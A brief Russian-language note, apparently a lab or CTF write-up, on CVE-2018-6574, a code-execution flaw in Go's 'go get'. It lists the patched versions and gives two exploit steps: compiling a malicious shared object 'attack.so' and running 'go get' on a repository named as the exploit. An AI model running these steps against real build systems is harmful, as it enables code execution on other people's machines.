
CVE-2018-6574 — эта уязвимость затрагивает команду go get в Golang и позволяет атакующему получить выполнение кода на системе путём установки вредоносной библиотеки; эта уязвимость была исправлена в Go 1.8. 7, 1.9. 4 и 1.10rc2. Golang будет собирать нативные расширения.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit